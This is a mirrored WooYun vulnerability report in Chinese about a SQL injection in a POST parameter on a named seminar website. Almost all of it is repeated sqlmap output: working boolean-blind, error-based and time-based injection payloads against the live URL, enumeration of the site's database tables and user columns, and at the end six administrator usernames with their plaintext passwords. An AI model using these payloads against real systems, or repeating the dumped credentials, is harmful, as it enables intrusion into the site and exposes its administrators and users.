乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-22: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-12-06: 厂商已经主动忽略漏洞,细节向公众公开
某大型电子中国高危SQL注射 # 全库泄露
某大型电子中国高危SQL注射 # 全库泄露分站存在post注入
注入连接:http://seminar.21ic.com:80/vod/byTime (POST)searchType=CALENDAR&searchName=wYpP&month=1&year=2007&button=%E6%9F%A5%E8%AF%A2sqlmap identified the following injection points with a total of 857 HTTP(s) requests:---Place: POSTParameter: year Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' RLIKE IF(6802=6802,2007,0x28) AND 'rYzJ'='rYzJ&button=%E6%9F%A5%E8%AF%A2 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND (SELECT 1594 FROM(SELECT COUNT(*),CONCAT(0x7170726371,(SELECT (CASE WHEN (1594=1594) THEN 1 ELSE 0 END)),0x7177706f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HLTl'='HLTl&button=%E6%9F%A5%E8%AF%A2 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (comment) Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND SLEEP(5)#&button=%E6%9F%A5%E8%AF%A2---back-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: year Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' RLIKE IF(6802=6802,2007,0x28) AND 'rYzJ'='rYzJ&button=%E6%9F%A5%E8%AF%A2 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND (SELECT 1594 FROM(SELECT COUNT(*),CONCAT(0x7170726371,(SELECT (CASE WHEN (1594=1594) THEN 1 ELSE 0 END)),0x7177706f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HLTl'='HLTl&button=%E6%9F%A5%E8%AF%A2 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (comment) Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND SLEEP(5)#&button=%E6%9F%A5%E8%AF%A2---back-end DBMS: MySQL 5.0available databases [2]:[*] 21ic_seminar[*] information_schemasqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: year Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' RLIKE IF(6802=6802,2007,0x28) AND 'rYzJ'='rYzJ&button=%E6%9F%A5%E8%AF%A2 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND (SELECT 1594 FROM(SELECT COUNT(*),CONCAT(0x7170726371,(SELECT (CASE WHEN (1594=1594) THEN 1 ELSE 0 END)),0x7177706f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HLTl'='HLTl&button=%E6%9F%A5%E8%AF%A2 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (comment) Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND SLEEP(5)#&button=%E6%9F%A5%E8%AF%A2---back-end DBMS: MySQL 5.0Database: 21ic_seminar[28 tables]+------------------+| YiiLog || user || admin || admin_action || announce || bulletin || c_promotion || change_award || chat || corp || customer || email_view || inquire || inquire_answer || inquire_item || inquire_question || join_meeting || link || link_click || meeting || meeting_cate || meeting_pre || mirror || signup_meeting || sqlmapoutput || temp_user || user_point || user_promotion |+------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: year Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' RLIKE IF(6802=6802,2007,0x28) AND 'rYzJ'='rYzJ&button=%E6%9F%A5%E8%AF%A2 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND (SELECT 1594 FROM(SELECT COUNT(*),CONCAT(0x7170726371,(SELECT (CASE WHEN (1594=1594) THEN 1 ELSE 0 END)),0x7177706f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HLTl'='HLTl&button=%E6%9F%A5%E8%AF%A2 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (comment) Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND SLEEP(5)#&button=%E6%9F%A5%E8%AF%A2---back-end DBMS: MySQL 5.0Database: 21ic_seminarTable: temp_user[11 columns]+------------+--------------+| Column | Type |+------------+--------------+| address | varchar(250) || city | varchar(50) || corp | varchar(250) || email | varchar(250) || industrial | varchar(250) || mobile | varchar(50) || postcode | varchar(50) || province | varchar(50) || tel | varchar(250) || truename | varchar(250) || username | varchar(250) |+------------+--------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: year Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' RLIKE IF(6802=6802,2007,0x28) AND 'rYzJ'='rYzJ&button=%E6%9F%A5%E8%AF%A2 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND (SELECT 1594 FROM(SELECT COUNT(*),CONCAT(0x7170726371,(SELECT (CASE WHEN (1594=1594) THEN 1 ELSE 0 END)),0x7177706f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HLTl'='HLTl&button=%E6%9F%A5%E8%AF%A2 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (comment) Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND SLEEP(5)#&button=%E6%9F%A5%E8%AF%A2---back-end DBMS: MySQL 5.0Database: 21ic_seminarTable: admin[4 columns]+----------------+--------------+| Column | Type |+----------------+--------------+| admin_id | int(11) || admin_name | varchar(50) || admin_password | varchar(250) || admin_priv | tinyint(4) |+----------------+--------------+Database: 21ic_seminarTable: user[28 columns]+-----------------+---------------------+| Column | Type |+-----------------+---------------------+| address | varchar(250) || auth_code | varchar(50) || auth_date | datetime || auth_email | varchar(150) || auth_ip | varchar(50) || auth_web | varchar(150) || bbs_sync | tinyint(3) unsigned || bbs_user_id | int(11) || c_pr_id | int(11) || city | varchar(50) || corp | varchar(250) || department | varchar(250) || email | varchar(250) || filter | int(11) || industrial | varchar(250) || is_auth | tinyint(3) unsigned || is_auth_check | tinyint(3) unsigned || is_auth_lock | int(11) || mobile | varchar(50) || postcode | varchar(50) || promotion_point | int(11) || province | varchar(50) || responsibility | varchar(50) || tel | varchar(250) || truename | varchar(250) || update_date | datetime || user_id | int(11) || username | varchar(250) |+-----------------+---------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: year Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' RLIKE IF(6802=6802,2007,0x28) AND 'rYzJ'='rYzJ&button=%E6%9F%A5%E8%AF%A2 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND (SELECT 1594 FROM(SELECT COUNT(*),CONCAT(0x7170726371,(SELECT (CASE WHEN (1594=1594) THEN 1 ELSE 0 END)),0x7177706f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HLTl'='HLTl&button=%E6%9F%A5%E8%AF%A2 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (comment) Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND SLEEP(5)#&button=%E6%9F%A5%E8%AF%A2---back-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: year Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' RLIKE IF(6802=6802,2007,0x28) AND 'rYzJ'='rYzJ&button=%E6%9F%A5%E8%AF%A2 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND (SELECT 1594 FROM(SELECT COUNT(*),CONCAT(0x7170726371,(SELECT (CASE WHEN (1594=1594) THEN 1 ELSE 0 END)),0x7177706f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HLTl'='HLTl&button=%E6%9F%A5%E8%AF%A2 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (comment) Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND SLEEP(5)#&button=%E6%9F%A5%E8%AF%A2---back-end DBMS: MySQL 5.0Database: 21ic_seminarTable: admin[6 entries]+-------------+| admin_name |+-------------+| admin || karen || Seminar21ic || test001 || xufang || yqg |+-------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: year Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' RLIKE IF(6802=6802,2007,0x28) AND 'rYzJ'='rYzJ&button=%E6%9F%A5%E8%AF%A2 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND (SELECT 1594 FROM(SELECT COUNT(*),CONCAT(0x7170726371,(SELECT (CASE WHEN (1594=1594) THEN 1 ELSE 0 END)),0x7177706f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HLTl'='HLTl&button=%E6%9F%A5%E8%AF%A2 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (comment) Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND SLEEP(5)#&button=%E6%9F%A5%E8%AF%A2---back-end DBMS: MySQL 5.0Database: 21ic_seminarTable: admin[6 entries]+-------------+------------------+| admin_name | admin_password |+-------------+------------------+| admin | Seminar_2121 || karen | karen800316 || Seminar21ic | 2014_Seminar_Jyx || test001 | 21iccom || xufang | XUFANG20140521 || yqg | yqg*2013 |+-------------+------------------+
过滤
未能联系到厂商或者厂商积极拒绝
漏洞Rank:4 (WooYun评价)